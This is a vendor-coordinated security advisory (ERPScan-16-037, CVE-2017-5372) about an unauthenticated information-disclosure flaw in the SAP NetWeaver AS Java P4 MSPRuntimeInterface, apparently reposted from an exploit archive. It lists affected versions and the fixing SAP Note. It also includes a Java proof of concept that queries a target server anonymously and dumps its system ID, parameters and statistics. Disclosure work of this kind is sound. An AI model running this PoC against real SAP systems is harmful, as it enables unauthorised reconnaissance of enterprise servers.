SAP NetWeaver AS Java P4 MSPRUNTIMEINTERFACE Information Disclosure Vulnerability

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.11-7.4

Vendor URL: http://SAP.com

Bugs: Information disclosure

Sent:  10.03.2016

Reported: 11.03.2016

Vendor response: 11.03.2016

Date of Public Advisory: 12.10.2016

Reference: SAP Security Note 2331908

Author:  Vahagn @vah_13 Vardanyan (ERPScan)



Description

1. ADVISORY INFORMATION

Title:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE
INFORMATION DISCLOSURE

Advisory ID:[ERPSCAN-16-037]

Risk: high

Advisory URL:
https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/

Date published: 11.01.2017

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Information disclosure

Impact: broken authentication

Remotely Exploitable: yes

Locally Exploitable: no

CVE: CVE-2017-5372

CVSS Information

CVSS Base Score v3:    7.3 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond the
vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity Low (L)

A : Impact to Availability Low (L)


3. VULNERABILITY DESCRIPTION

Anonymous attacker can send a special request and get sensitive information
about an SAP system using SAP P4.

4. VULNERABLE PACKAGES


SERVERCORE

7.11
7.20
7.30
7.31
7.40
7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2331908



6. AUTHOR

 Vahagn Vardanyan (ERPScan)



7. TECHNICAL DESCRIPTION

SAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any
authorization to call the following functions:


getInformation

getParameters

getServiceInfo

getStatistic

getClientStatistic

PoC (Java language)


package sap_p4_poc;

*****

Properties p = new Properties();

p.put("java.naming.factory.initial",
"com.sap.engine.services.jndi.InitialContextFactoryImpl");

p.put("java.naming.provider.url", SAP_IP+":"+SAP_PORT);

InitialContext initialContext = new InitialContext(p);

Context initialContext = initialContext;

MSPRuntimeInterface serialObj =
(MSPRuntimeInterface)initialContext.lookup("msp");

System.out.println("----------------" + serialObj +
"----------------------------------------");

System.out.println("----------------SID:" + serialObj.getSystemId() +
"----------------------------------------");

System.out.println("----------------------getInformation:--------------------------------");

TreeMap Inf = serialObj.getInformation();

print_treee_map(Inf);

System.out.println("----------------------getParameters:----------------------------------");

TreeMap Par = serialObj.getParameters();

print_treee_map(Par);

System.out.println("-----------------------getServiceInfo:---------------------------------");

TreeMap Serv = serialObj.getServiceInfo();

print_treee_map(Serv);

System.out.println("-----------------------getStatistic:---------------------------------");

TreeMap Stat = serialObj.getStatistic();

print_treee_map(Stat);

System.out.println("-----------------------getClientStatistic:---------------------------------");

TreeMap Cli = serialObj.getClientStatistic();

print_treee_map(Cli);



8. REPORT TIMELINE

Reported: 11.03.2016

Vendor response: 11.03.2016

Date of Public Advisory: 12.10.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/

#  0day.today [2018-02-20]  #